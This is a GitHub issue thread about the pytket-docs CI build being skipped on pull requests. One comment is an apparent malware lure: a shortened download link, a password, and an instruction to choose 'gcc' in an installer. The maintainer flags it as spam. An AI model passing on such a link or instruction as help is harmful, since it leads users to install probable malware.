### ISSUE TITLE
Manual and examples C.I. build not running when PRs are made 

### ISSUE THREAD

**Issue by CalMacCQ** [CQCL/pytket-docs#368]
The build seems to be skipped for some reason. We should of course rerun the build when any of the source files or dependencies are modified in a PR. 

See for example -> https://github.com/CQCL/pytket-docs/actions/runs/10582148135/job/29321163590

I guess this would be due to an oversight in #339 ?

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by CalMacCQ** [comment]
Deleted comment, supsected spam
